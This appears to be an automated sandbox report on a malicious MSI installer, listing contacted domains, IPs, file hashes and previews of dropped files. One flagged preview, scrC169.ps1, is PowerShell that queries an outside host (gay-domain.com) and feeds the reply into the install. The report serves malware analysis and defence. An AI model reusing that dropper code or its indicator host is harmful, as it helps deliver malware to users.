    http://ccsca2021.crl.certum.pl/ccsca2021.crl0sMicrosoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#lib-command-parameters.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.certum.pl/CPS0Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.color.org)Qt5Gui.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1760744523.0000000007830000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://repository.certum.pl/ccsca2021.cer0Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/dotnet/runtimeMicrosoft.CSharp.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ylib-command-parameters.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://repository.certum.pl/ctsca2021.cer0Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1756900335.00000000051D1000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://subca.ocsp-certum.com05Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://subca.ocsp-certum.com02Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/mono/linker/issues/1906.Microsoft.CSharp.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://subca.ocsp-certum.com01Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://contoso.com/powershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://www.openssl.org/Hlibssl-1_1.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.certum.pl/ctnca2.crl0lMicrosoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://repository.certum.pl/ctnca2.cer09Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://gay-domain.compowershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.0000000005877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.000000000583F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.0000000005892000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://ccsca2021.ocsp-certum.com05Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1756900335.00000000051D1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://gay-domain.compowershell.exe, 00000003.00000002.1756900335.0000000005881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1756900335.000000000545F000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.certum.pl/CPS0Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    172.67.154.227
    		gay-domain.comUnited States
    		13335CLOUDFLARENETUSfalse

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1455422
    Start date and time:2024-06-11 20:22:01 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 7m 7s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:9
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:setup.msi
    Detection:MAL
    Classification:mal52.evad.winMSI@7/116@1/1
    Cookbook Comments:
    • Found application associated with file extension: .msi

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • VT rate limit hit for: setup.msi

    Simulations

    Behavior and APIs

    TimeTypeDescription
    14:22:58API Interceptor24x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    CLOUDFLARENETUShttps://blogue.corim.qc.caGet hashmaliciousUnknownBrowse
    • 1.1.1.1
    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
    • 188.114.97.3
    Sales Contract.exeGet hashmaliciousAgentTeslaBrowse
    • 172.67.74.152
    https://shoutout.wix.com/so/c6P07NDxS/c?w=TZKBCXkrVA_LfU5BB-tTV_q5lDeQIvLgoBVjKb-7XVw.eyJ1IjoiaHR0cHM6Ly9mdWxsYmx1bWVmaXRuZXNzYXBpLmNvbS9peXUvb25lZHJpdiIsInIiOiJmNmUzNjM0Ni01MDUyLTQzYjEtODYzMy1hNDBkZTVhNTg3ZmYiLCJtIjoibWFpbCIsImMiOiJlZDQ5ZmRkMC02YjcxLTQ1MjgtODA0ZC1lMzc0N2M4MjZiNmQifQGet hashmaliciousHTMLPhisherBrowse
    • 188.114.97.3
    rDHLAWBCOMMERCAILINVOICEANDBILLOFLANDING.exeGet hashmaliciousAgentTeslaBrowse
    • 104.26.13.205
    Payment_confirmation.xlsGet hashmaliciousUnknownBrowse
    • 172.67.135.214
    rPROFORMAINVOICE.exeGet hashmaliciousAgentTeslaBrowse
    • 104.26.12.205
    rRO9Q2235.exeGet hashmaliciousAgentTeslaBrowse
    • 172.67.74.152
    Payment_confirmation.xlsGet hashmaliciousUnknownBrowse
    • 104.21.26.96
    Payment_confirmation.xlsGet hashmaliciousUnknownBrowse
    • 104.21.26.96

    JA3 Fingerprints

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    3b5074b1b5d032e5620f69f9f700ff0ehttps://t.co/MWLpFtR9zTGet hashmaliciousUnknownBrowse
    • 172.67.154.227
    Sales Contract.exeGet hashmaliciousAgentTeslaBrowse
    • 172.67.154.227
    rDHLAWBCOMMERCAILINVOICEANDBILLOFLANDING.exeGet hashmaliciousAgentTeslaBrowse
    • 172.67.154.227
    rPROFORMAINVOICE.exeGet hashmaliciousAgentTeslaBrowse
    • 172.67.154.227
    rRO9Q2235.exeGet hashmaliciousAgentTeslaBrowse
    • 172.67.154.227
    https://drive.google.com/file/d/1rUX5pF_yChUfocjQZEgSZVDbnTsCbsyI/view?usp=sharing_eil_m&ts=66679781Get hashmaliciousUnknownBrowse
    • 172.67.154.227
    https://download.filezilla-project.org/client/FileZilla_3.67.0_win64_sponsored2-setup.exeGet hashmaliciousUnknownBrowse
    • 172.67.154.227
    https://mcfp.felk.cvut.czGet hashmaliciousPhisherBrowse
    • 172.67.154.227
    wizeninglYZn.ps1Get hashmaliciousUnknownBrowse
    • 172.67.154.227
    https://trilogyfreight.atlassian.net/wiki/external/NjQzNzlhNzZkYmIyNGVlZWEwM2NiMGQzMTExYjQ2OGQGet hashmaliciousUnknownBrowse
    • 172.67.154.227

    Dropped Files

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Core.dllXih96kXne2.msiGet hashmaliciousUnknownBrowse
      setup.msiGet hashmaliciousUnknownBrowse
        0Q9vOYCeed.msiGet hashmaliciousUnknownBrowse
          f1kqfrs9ME.msiGet hashmaliciousUnknownBrowse
            tArE72wLqu.msiGet hashmaliciousUnknownBrowse
              52bwxFx7YB.msiGet hashmaliciousUnknownBrowse
                Uvaz36EMnI.msiGet hashmaliciousUnknownBrowse

                  Created / dropped Files

                  C:\Config.Msi\49b9d9.rbs

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:modified
                  Size (bytes):22493
                  Entropy (8bit):5.842317853728867
                  Encrypted:false
                  SSDEEP:384:GzpdScj+DS+O1A5mfhNlvJumytdsixzSE62S6th8UqX7JYLfS2wl7n958fzDrHQp:GzpdScj+DS+O1A5ehNlvJumytdsixmEI
                  MD5:41F482FE639E480EF4B969B83BC31F13
                  SHA1:114C2E5ACE3ED3613467DB0E4B25C6A6D2946EF7
                  SHA-256:8B447CC9A531847FBD9126F6778C85AF27B6CF678790E1CCD1B4D22E8B9C9891
                  SHA-512:AD122B4EDC010713C4A2423A5DB176F010157E8860D8B381363E6ACCCDC0177F4A4BBB2164E5567233FA8D8C8B984D43D737ABDB511DADF078E89DBBF9D0A953
                  Malicious:false
                  Reputation:low
                  Preview:...@IXOS.@.....@.r.X.@.....@.....@.....@.....@.....@......&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}..JoisApp..setup.msi.@.....@.....@.....@......icon_31.exe..&.{BCD29B76-7AAB-464F-8087-3934E74A40A6}.....@.....@.....@.....@.......@.....@.....@.......@......JoisApp......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{1F3FBE01-7522-4F00-979B-D5298497DD99}&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}.@......&.{48980612-759A-424A-8EED-F5EB16DA0D3F}&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}.@......&.{9F9A61E0-BEAA-43E2-97E4-10B819357B2E}&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}.@......&.{14E95683-EBC2-405D-B480-B5C8551872DF}&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}.@......&.{8CC0B5AB-4ECC-4D13-B26C-276315F2D6A0}&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}.@......&.{EF33CCDF-9BD6-497B-985C-BBE76655F75C}&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}.@......&.{20D87383-8C0E-4E35-B64B-ADEBDE1F3A86}&.{C7E6E451-02A3-4DC3-B2F

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1852
                  Entropy (8bit):5.722583246549926
                  Encrypted:false
                  SSDEEP:48:gy3WSU4y4RQmFoUeUmfmZ9tK8NWR88n3VbFgyp2sg8SrW:goLHyIFKLFOZ2KW53NFgnrW
                  MD5:67D647F77468788F1ACAB99B80A1456A
                  SHA1:752293689AAD96B3E3AB181464B76F2A82461421
                  SHA-256:D4902591B1C9CC634FA4A0B3C830F67199D5133031AE7E72130AA022A18B0C85
                  SHA-512:F51669D0229F9A9A4D7E7F633A90E4CA92862A43E3CDFAF340FF49739C3E1A63D75FC1523634D8AC05FA7018214E2803F95B59DEC33E277623C86EED65BC7DE3
                  Malicious:false
                  Reputation:low
                  Preview:@...e...........o.....................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prqpuxge.4sm.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ummbptzo.u52.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\msiC168.txt

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):54
                  Entropy (8bit):3.042367221086455
                  Encrypted:false
                  SSDEEP:3:QzHlFldPWNlANf5Yplf955:QTvl03ANqLN
                  MD5:9F5BFFBB1F8F8340BF45E22A09517EE1
                  SHA1:A5566C63B3681CD56E3B76ED528449CA33A36CC6
                  SHA-256:4CA8664DA66AD8C90CE03725F92BF7571CF86A290A9EC4A073DAD293A60836EF
                  SHA-512:8B1B1D13DE5AEE1748428FFE1EE6131A63E819DF8DD42088B7D581FF957ADB30E12BA3637E00FAC7D7B5AA71A5E35CE09F52772D38F1C441ADB19E5E2CD05423
                  Malicious:true
                  Reputation:low
                  Preview:..V.a.l.u.e.E.x.p.i.r.e. .:.<.-.>.:. .0. .<.<.:.>.>. .

                  C:\Users\user\AppData\Local\Temp\pssC17B.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\msiexec.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6668
                  Entropy (8bit):3.5127462716425657
                  Encrypted:false
                  SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                  MD5:30C30EF2CB47E35101D13402B5661179
                  SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                  SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                  SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                  Malicious:true
                  Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

                  C:\Users\user\AppData\Local\Temp\scrC169.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\msiexec.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):572
                  Entropy (8bit):3.588916838742196
                  Encrypted:false
                  SSDEEP:12:QHxpl5aI5snfsGUBQM3I2q4clKcOW4l03g+g+q93KW4l03g1:QRpOI5sUGIQMY2O8jD+Mij1
                  MD5:C48CFA78E53CBA5C8F66E20F1680B7E6
                  SHA1:568A66810DEFFA9BF064C58DEBE45977D39CDC5B
                  SHA-256:181E6BEE7B51088342B9EF537BFA91E1F8DFA2E1333CBE78F1CD6399DE27F8BE
                  SHA-512:64435FC2AD4530839926D77BEBDB6173C712416C88413F9D1A1AB96D585702F6CDA056075B282C46886878B47ECA1FF8E90FA209449463C94B034D9ACE231071
                  Malicious:true
                  Preview:..t.r.y.....{..... . . . .$.u.r.l. .=. .".h.t.t.p.:././.g.a.y.-.d.o.m.a.i.n...c.o.m./.u.s.e.r.L.i.c.e.n.s.e...p.h.p.?.i.u.g.e.h.=.9.5.0.1.&.a.i.g.f.j.=.s.o.j.g.j.f.&.s.u.f.v.=.6.7."......... . . . .$.r.e.s.p.o.n.s.e.S.t.r.i.n.g. .=. .I.n.v.o.k.e.-.R.e.s.t.M.e.t.h.o.d. .-.U.r.i. .$.u.r.l. .-.M.e.t.h.o.d. .G.e.t. .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g......... . . . .A.I._.S.e.t.M.s.i.P.r.o.p.e.r.t.y. .V.a.l.u.e.E.x.p.i.r.e. .$.r.e.s.p.o.n.s.e.S.t.r.i.n.g...r.e.s.u.l.t.....}.....c.a.t.c.h.....{..... . . . .A.I._.S.e.t.M.s.i.P.r.o.p.e.r.t.y. .V.a.l.u.e.E.x.p.i.r.e. .0.....}.

                  C:\Users\user\AppData\Roaming\Microsoft\Installer\{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}\icon_31.exe

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:MS Windows icon resource - 5 icons, 96x96, 32 bits/pixel, 72x72, 32 bits/pixel
                  Category:dropped
                  Size (bytes):74814
                  Entropy (8bit):4.222546221932802
                  Encrypted:false
                  SSDEEP:384:ZjEycsRokXVkGKlrBRRRR/ur/f4C2+27g6Do:ZNcs/VkhlYf4CffG
                  MD5:32BC544E3EB5F62017DDB0E8E22F3048
                  SHA1:4CAB98A7CABD3C9D6FC99AD1E4663BC06C7D73CF
                  SHA-256:FAF4A3D5669725D2059158A4039BB03E0A599685C61794687E14D21F3F271132
                  SHA-512:294AACF59822FE78C0E6D3178988E313A3E42BE997162C77581E9BE334F926881F10A955AA337549CE5889DFA51AB188767521C3B23AD27276EDC1F97FD7D8D1
                  Malicious:false
                  Preview:......``.... .....V...HH.... ..T......00.... ..%...... .... ............... .h.......(...`......... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\D3DCompiler_47_cor3.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):4917392
                  Entropy (8bit):6.398595787699969
                  Encrypted:false
                  SSDEEP:49152:hCZnRO4XyM53Rkq4ypQqdoRpmrgBVYvkaRwv/ZD0/WYLDltog/RfznLeHTRhFRNz:oG2QCS6HHzog/pznA7T6V
                  MD5:A001650A1213F88EA8E69A582DC8FF53
                  SHA1:66393B4CBD32B0BB0A0EA72A683028BB07745467
                  SHA-256:7ADAF5082F0446C38F668CF1F30A4634896DB6B291053852729BA7C142AEB3C3
                  SHA-512:E02E3FEA376B60F650C94D8415793D81C90E80E1E3F021002EE500422AFB812D406BBC466448F965DA0AE42A208BBE65E2D731DBCF763631D8E2B9815F31F092
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...;............." ......8..........<).......................................K.....~.K...`A........................................`%G.x....(G.P.....J.@.....H.......J..(....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\LICENSE

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):9450
                  Entropy (8bit):4.752775356515259
                  Encrypted:false
                  SSDEEP:96:TUzTuUET8+wPHQrAe3tKYOVqQCQje70/ujhLq3GGBeRJz1dmvED4foJopOVrA0ic:TUzi9LmZqvglBen5d+ErI0EwbLx
                  MD5:3D158A2C428C88547D5FFDC70E3F5A69
                  SHA1:69F8A7A84370C35D839BAABE28D51A8CBAE8F138
                  SHA-256:C423E5A75B647F900ACA691A7F48DDC131F2F8C3D3DAAA597093CF576C92BA79
                  SHA-512:8E0ED753B6A6C82E0C94F721D805C6998101349D96D4F62280BA6CFCB3E4E1FD4A677B0AF0A7F4BF16547D52A256E8DB01D9F3A46C9F0227EAA51F9F55DC95DA
                  Malicious:false
                  Preview:This collective work is Copyright (c) 2003-2023 Rony Shapiro..Individual portions may be copyright by individual contributors, and.are included in this collective work with permission of the copyright .owners. All rights reserved. Use of the code is allowed under the.Artistic License 2.0 terms, as follows:.. Artistic License 2.0..Copyright (c) 2000-2006, The Perl Foundation...Everyone is permitted to copy and distribute verbatim copies of this.license document, but changing it is not allowed...Preamble.--------.This license establishes the terms under which a given free software.Package may be copied, modified, distributed, and/or.redistributed. The intent is that the Copyright Holder maintains some.artistic control over the development of that Package while still.keeping the Package available as open source and free software. ..You are always permitted to make arrangements wholly outside of this.license directly with the Copyright Holder of a given Package. If

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.CSharp.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):1042576
                  Entropy (8bit):6.759737448867369
                  Encrypted:false
                  SSDEEP:24576:hAS0l87Mm5k1E+u1xjx1Db+Vu9yH1zsYKhdi4YBurK:hal87Mm53LlBb+Vu9yH4XiZ
                  MD5:C4F92C6C85DA815EB78DB8168A0D0FB4
                  SHA1:79764CEC92474C19AE32FA7E797E1A6067E54CB1
                  SHA-256:BF206E6A9D420D2D1F8AA05493ABDF772BF782F26A32AFAA0A7B0B3B4054D0AA
                  SHA-512:FFF383DE456C77CB78BFB191A4A1D1EF23E8B5E9219755A1B6FEDAD2AA8E0B3A534C3C74C12C2CBA0C9A9855A4EEB85E2094C5D8D4A02B15E4B7C6A12DF30143
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...;.Z..........." ................................................................S(....`...@......@............... .......................................6...j.......(......<...hD..T...............................................................H............text............................... ..`.data...D...........................@....reloc..<...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.DiaSymReader.Native.amd64.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):1841296
                  Entropy (8bit):6.37694360746642
                  Encrypted:false
                  SSDEEP:24576:2z0s9kT3H8I0bo5rjwjnbRCJMy37DjZ3IrVynoT/RUqtMAIEohkGXTwImg:2Ys9m3H5rjQn1CiAnZ3yV+oTZQEoTT
                  MD5:B414202B5EC989E1D27DF8184C3F93D2
                  SHA1:141666422A99B1AFAD1B1DC2630D9D210D873115
                  SHA-256:462ABED5C49A248C271BDBA8E1F03ADE055C5AF187E8F4DB3451FE8C9D02B585
                  SHA-512:FBB3505C86EDB1B2DBD2ACA1088CB0EB8C42C6ADA0C30618BA1C972F2962F6FA9FF5E95687C0B283C6BDEE419A0A7F1DE130C565D0656FA2BEEE904E97B87FE2
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.+7..Ed..Ed..Ed..Ae..Ed3.Fe..Ed3.@e..Ed3.Ae..EdI.Ae..EdI.Fe..Ed..De..Ed..Dd.EdI.@ea.EdI.Le..EdI.Ee..EdI..d..EdI.Ge..EdRich..Ed........................PE..d......d.........." ................0~....................................................`A........................................0...p..../..P.... ..8.......D'.......(...0...K......T............................n..8...................P-..`....................text...L........................... ..`.rdata.............................@..@.data........@...F...,..............@....pdata..D'.......(...r..............@..@.didat..p...........................@..._RDATA..............................@..@.rsrc...8.... ......................@..@.reloc...K...0...L..................@..B........................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.VisualBasic.Core.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):1245840
